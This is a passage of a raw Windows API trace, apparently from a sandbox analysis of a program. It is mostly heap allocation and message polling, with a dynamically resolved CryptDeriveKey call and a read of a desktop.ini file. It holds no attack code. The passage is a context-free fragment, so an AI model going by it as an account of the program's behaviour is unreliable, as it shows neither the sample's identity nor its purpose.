lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9e40 [0267.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9e40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.818] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.833] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0267.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.840] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.841] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.841] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.841] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.841] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.841] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0267.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.841] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0267.842] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0267.842] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0267.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.843] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.843] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.843] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 